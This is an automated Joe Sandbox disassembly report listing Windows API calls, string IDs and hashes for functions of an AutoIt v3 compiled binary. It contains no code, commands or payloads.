                                            • Instruction ID: 82d548c146868cfdb72329b53c233897ad70ad0837522eac0ea589065f4ceda2
                                            • Opcode Fuzzy Hash: 1ae7ca9a6d7dd30fb66aaacd490d93f0b6e6b1a67467f949ededab35697781c8
                                            • Instruction Fuzzy Hash: FF512B76900208AFDF10AFA8DC48EAEBB79FF08324F114515F915AB2E1D7759A409F90
                                            APIs
                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0086B7B0
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0086B7C1
                                            • CharNextW.USER32(0000014E), ref: 0086B7F0
                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0086B831
                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0086B847
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0086B858
                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0086B875
                                            • SetWindowTextW.USER32(?,0000014E), ref: 0086B8C7
                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0086B8DD
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0086B90E
                                            • _memset.LIBCMT ref: 0086B933
                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0086B97C
                                            • _memset.LIBCMT ref: 0086B9DB
                                            • SendMessageW.USER32 ref: 0086BA05
                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0086BA5D
                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0086BB0A
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0086BB2C
                                            • GetMenuItemInfoW.USER32(?), ref: 0086BB76
                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0086BBA3
                                            • DrawMenuBar.USER32(?), ref: 0086BBB2
                                            • SetWindowTextW.USER32(?,0000014E), ref: 0086BBDA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                            • String ID: 0
                                            • API String ID: 1073566785-4108050209
                                            • Opcode ID: 54e91b476623a3f687c439e75f242003d45ead066a08f9a59579a684b6cc5d13
                                            • Instruction ID: e45f4cf48cdfa4dc0bd289fcd40cb9f703e27744c385b5c40ba21f5fe8a8f157
                                            • Opcode Fuzzy Hash: 54e91b476623a3f687c439e75f242003d45ead066a08f9a59579a684b6cc5d13
                                            • Instruction Fuzzy Hash: 17E16CB1900218ABDF20DF65CC84EEE7B78FF05718F118156F959EA291DB708A81CF61
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 0086778A
                                            • GetDesktopWindow.USER32 ref: 0086779F
                                            • GetWindowRect.USER32(00000000), ref: 008677A6
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00867808
                                            • DestroyWindow.USER32(?), ref: 00867834
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0086785D
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086787B
                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008678A1
                                            • SendMessageW.USER32(?,00000421,?,?), ref: 008678B6
                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008678C9
                                            • IsWindowVisible.USER32(?), ref: 008678E9
                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00867904
                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00867918
                                            • GetWindowRect.USER32(?,?), ref: 00867930
                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00867956
                                            • GetMonitorInfoW.USER32 ref: 00867970
                                            • CopyRect.USER32(?,?), ref: 00867987
                                            • SendMessageW.USER32(?,00000412,00000000), ref: 008679F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                            • String ID: ($0$tooltips_class32
                                            • API String ID: 698492251-4156429822
                                            • Opcode ID: 629ed497611a8bdaa7a1dc1ea3639c2a0d9f753f0f45ce07f1bb1faabafe108c
                                            • Instruction ID: d0887a548c62260f764f8adaf8ab162f1b72fe2ca4ac36782fc922985679723c
                                            • Opcode Fuzzy Hash: 629ed497611a8bdaa7a1dc1ea3639c2a0d9f753f0f45ce07f1bb1faabafe108c
                                            • Instruction Fuzzy Hash: 97B17A71608301AFDB44DF68C989B6ABBE5FF88314F00891DF599DB291DB74E804CB96
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00846CFB
                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00846D21
                                            • _wcscpy.LIBCMT ref: 00846D4F
                                            • _wcscmp.LIBCMT ref: 00846D5A
                                            • _wcscat.LIBCMT ref: 00846D70
                                            • _wcsstr.LIBCMT ref: 00846D7B
                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00846D97
                                            • _wcscat.LIBCMT ref: 00846DE0
                                            • _wcscat.LIBCMT ref: 00846DE7
                                            • _wcsncpy.LIBCMT ref: 00846E12
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                            • API String ID: 699586101-1459072770
                                            • Opcode ID: faef54e1a5ec6caeaa1d03a0944156e9d74cd612bbf61bb7bb69a16ad9cecdca
                                            • Instruction ID: 0bbd69c079b929a67b86c9d885244b314f34773169b6792e71502d2a4874fd2f
                                            • Opcode Fuzzy Hash: faef54e1a5ec6caeaa1d03a0944156e9d74cd612bbf61bb7bb69a16ad9cecdca
                                            • Instruction Fuzzy Hash: CB41E471A04214BBEB00BB68DC47EBF77BCFF51714F140066F901E2282FA759A5096A7
                                            APIs
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0081A939
                                            • GetSystemMetrics.USER32(00000007), ref: 0081A941
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0081A96C
                                            • GetSystemMetrics.USER32(00000008), ref: 0081A974
                                            • GetSystemMetrics.USER32(00000004), ref: 0081A999
                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0081A9B6
                                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0081A9C6
                                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0081A9F9
                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0081AA0D
                                            • GetClientRect.USER32(00000000,000000FF), ref: 0081AA2B
                                            • GetStockObject.GDI32(00000011), ref: 0081AA47
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0081AA52
                                              • Part of subcall function 0081B63C: GetCursorPos.USER32(000000FF), ref: 0081B64F
                                              • Part of subcall function 0081B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0081B66C
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000001), ref: 0081B691
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000002), ref: 0081B69F
                                            • SetTimer.USER32(00000000,00000000,00000028,0081AB87), ref: 0081AA79
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                            • String ID: AutoIt v3 GUI
                                            • API String ID: 1458621304-248962490
                                            • Opcode ID: 88d44ae691db68f8da83bcc84d16bf8c026c1c6b4b0e0278c8e2adcd5119b8b4
                                            • Instruction ID: 03d6b1fc3e6766fce4b7958d83dc02e0cf4823e7284797d5f9d7793269cded47
                                            • Opcode Fuzzy Hash: 88d44ae691db68f8da83bcc84d16bf8c026c1c6b4b0e0278c8e2adcd5119b8b4
                                            • Instruction Fuzzy Hash: DDB13A71A0121A9FDB18DFA8DC89FEA7BB8FF18314F114229FA15E6290D774D890CB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Foreground
                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                            • API String ID: 62970417-1919597938
                                            • Opcode ID: f63e30a38d4ab8d7c6f1c2539c3a8bba7cbd3070368aacddc0d8a556cff19bf1
                                            • Instruction ID: a631ef78b8dbf40020ad07391e4315f6631a78934fa35905edbd0146dce195bb
                                            • Opcode Fuzzy Hash: f63e30a38d4ab8d7c6f1c2539c3a8bba7cbd3070368aacddc0d8a556cff19bf1
                                            • Instruction Fuzzy Hash: 5BD1C430508747DBCB04EF58C88199AFBA4FF54344F108A19F45AD76A2DB70E99ACBD2
                                            APIs
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00863735
                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0089DC00,00000000,?,00000000,?,?), ref: 008637A3
                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008637EB
                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00863874
                                            • RegCloseKey.ADVAPI32(?), ref: 00863B94
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00863BA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Close$ConnectCreateRegistryValue
                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                            • API String ID: 536824911-966354055
                                            • Opcode ID: 1485fffd8071fab5ea51c8181ccf457c8bc14a7c5370dfbe958a5fe2344f6dd7
                                            • Instruction ID: 7e8af120e1816371183be3d6461c5b4b9e78de82d06ecc5ef679e52d50fb6213
                                            • Opcode Fuzzy Hash: 1485fffd8071fab5ea51c8181ccf457c8bc14a7c5370dfbe958a5fe2344f6dd7
                                            • Instruction Fuzzy Hash: AE024A756046119FCB14EF18C851A2AB7E5FF89720F05855DF98ADB3A2CB30ED41CB82
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00866C56
                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00866D16
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                            • API String ID: 3974292440-719923060
                                            • Opcode ID: ef9c8afb6c2362d0c543201b92d7dac2ddaccb61379000c4b3781a16e446b514
                                            • Instruction ID: 3fe884ddc652363c89479aea91d842af66310f08508ef4fd97d8a6dbe8d07b91
                                            • Opcode Fuzzy Hash: ef9c8afb6c2362d0c543201b92d7dac2ddaccb61379000c4b3781a16e446b514
                                            • Instruction Fuzzy Hash: 64A183302143869FCB14EF18C851AAAB7A5FF44314F114968B956DB3D2EF31EC19CB82
                                            APIs
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0083CF91
                                            • __swprintf.LIBCMT ref: 0083D032
                                            • _wcscmp.LIBCMT ref: 0083D045
                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0083D09A
                                            • _wcscmp.LIBCMT ref: 0083D0D6
                                            • GetClassNameW.USER32(?,?,00000400), ref: 0083D10D
                                            • GetDlgCtrlID.USER32(?), ref: 0083D15F
                                            • GetWindowRect.USER32(?,?), ref: 0083D195
                                            • GetParent.USER32(?), ref: 0083D1B3
                                            • ScreenToClient.USER32(00000000), ref: 0083D1BA
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0083D234
                                            • _wcscmp.LIBCMT ref: 0083D248
                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0083D26E
                                            • _wcscmp.LIBCMT ref: 0083D282
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                            • String ID: %s%u
                                            • API String ID: 3119225716-679674701
                                            • Opcode ID: a694c8c55f36e2c72470df2587007e74598bd59052fd7c45d6cecac31ee43f43
                                            • Instruction ID: b14bbe1446293c77e37600ecdcedcbdb87f7c32243272907aebed917a0c07ed0
                                            • Opcode Fuzzy Hash: a694c8c55f36e2c72470df2587007e74598bd59052fd7c45d6cecac31ee43f43
                                            • Instruction Fuzzy Hash: 8BA1CF71604706AFDB15DF64E884FAAB7A8FF94314F008619F999D3190EB30EA46CBD1
                                            APIs
                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0083D8EB
                                            • _wcscmp.LIBCMT ref: 0083D8FC
                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0083D924
                                            • CharUpperBuffW.USER32(?,00000000), ref: 0083D941
                                            • _wcscmp.LIBCMT ref: 0083D95F
                                            • _wcsstr.LIBCMT ref: 0083D970
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0083D9A8
                                            • _wcscmp.LIBCMT ref: 0083D9B8
                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0083D9DF
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0083DA28
                                            • _wcscmp.LIBCMT ref: 0083DA38
                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0083DA60
                                            • GetWindowRect.USER32(00000004,?), ref: 0083DAC9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                            • String ID: @$ThumbnailClass
                                            • API String ID: 1788623398-1539354611
                                            • Opcode ID: bcb4101812a55489f79c66e2ed795477ea615d69262a90b1c2ae1e98ebb51a80
                                            • Instruction ID: ee74f4e4d65da10fef52fdefc6a14ba7d2cc6909ca27389f737081dd7d7f302a
                                            • Opcode Fuzzy Hash: bcb4101812a55489f79c66e2ed795477ea615d69262a90b1c2ae1e98ebb51a80
                                            • Instruction Fuzzy Hash: E2818E710083099BDB05DF14E985BAA7BE8FF84714F14846AFD89DA096EB30ED45CBE1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                            • API String ID: 1038674560-1810252412
                                            • Opcode ID: cfbb257a35e6118a47a94a6a77253148fd4b74d3de57898b3fda6995f6f74f9f
                                            • Instruction ID: 81fd3371e7ab24e7de49a5fd0a8f9e2d19d058bc2d2daf7bf7cb0cb6bc8a127a
                                            • Opcode Fuzzy Hash: cfbb257a35e6118a47a94a6a77253148fd4b74d3de57898b3fda6995f6f74f9f
                                            • Instruction Fuzzy Hash: 01318E31A44309E6DB24FB58ED53EEEB364FF60724F200529F461F12D1EF65AA1486A2
                                            APIs
                                            • LoadIconW.USER32(00000063), ref: 0083EAB0
                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0083EAC2
                                            • SetWindowTextW.USER32(?,?), ref: 0083EAD9
                                            • GetDlgItem.USER32(?,000003EA), ref: 0083EAEE
                                            • SetWindowTextW.USER32(00000000,?), ref: 0083EAF4
                                            • GetDlgItem.USER32(?,000003E9), ref: 0083EB04
                                            • SetWindowTextW.USER32(00000000,?), ref: 0083EB0A
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0083EB2B
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0083EB45
                                            • GetWindowRect.USER32(?,?), ref: 0083EB4E
                                            • SetWindowTextW.USER32(?,?), ref: 0083EBB9
                                            • GetDesktopWindow.USER32 ref: 0083EBBF
                                            • GetWindowRect.USER32(00000000), ref: 0083EBC6
                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0083EC12
                                            • GetClientRect.USER32(?,?), ref: 0083EC1F
                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0083EC44
                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0083EC6F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                            • String ID:
                                            • API String ID: 3869813825-0
                                            • Opcode ID: 5d12e0c103d73a039365ad21f72481d4f4698808b1d92253fb229c532fd46b93
                                            • Instruction ID: eda0b29745b97ee9b1721dfcd07cc2ab02a81791b59722ff8383c6fac98ebec0
                                            • Opcode Fuzzy Hash: 5d12e0c103d73a039365ad21f72481d4f4698808b1d92253fb229c532fd46b93
                                            • Instruction Fuzzy Hash: B6514A71900709AFDB21EFA8CD89E6EBBF5FF44714F004928E686E25E0D774A944CB50
                                            APIs
                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 008579C6
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008579D1
                                            • LoadCursorW.USER32(00000000,00007F03), ref: 008579DC
                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 008579E7
                                            • LoadCursorW.USER32(00000000,00007F01), ref: 008579F2
                                            • LoadCursorW.USER32(00000000,00007F81), ref: 008579FD
                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00857A08
                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00857A13
                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00857A1E
                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00857A29
                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00857A34
                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00857A3F
                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00857A4A
                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00857A55
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00857A60
                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00857A6B
                                            • GetCursorInfo.USER32(?), ref: 00857A7B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Cursor$Load$Info
                                            • String ID:
                                            • API String ID: 2577412497-0
                                            • Opcode ID: c62195fa681f4e06a7890bb022dec41dc001bd66450b5dee538a0baeb4058d08
                                            • Instruction ID: 758d5e7ee7c233e04051de39659d637e80e829363a5185f72f10f53b3cb8940e
                                            • Opcode Fuzzy Hash: c62195fa681f4e06a7890bb022dec41dc001bd66450b5dee538a0baeb4058d08
                                            • Instruction Fuzzy Hash: 2E3127B0D0831A6ADB119FB69C8999FBFE8FF04750F50452AE50DE7280DA78A5048FA1
                                            APIs
                                              • Part of subcall function 0081E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0080C8B7,?,00002000,?,?,00000000,?,0080419E,?,?,?,0089DC00), ref: 0081E984
                                              • Part of subcall function 0080660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008053B1,?,?,008061FF,?,00000000,00000001,00000000), ref: 0080662F
                                            • __wsplitpath.LIBCMT ref: 0080C93E
                                              • Part of subcall function 00821DFC: __wsplitpath_helper.LIBCMT ref: 00821E3C
                                            • _wcscpy.LIBCMT ref: 0080C953
                                            • _wcscat.LIBCMT ref: 0080C968
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0080C978
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0080CABE
                                              • Part of subcall function 0080B337: _wcscpy.LIBCMT ref: 0080B36F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                            • API String ID: 2258743419-1018226102
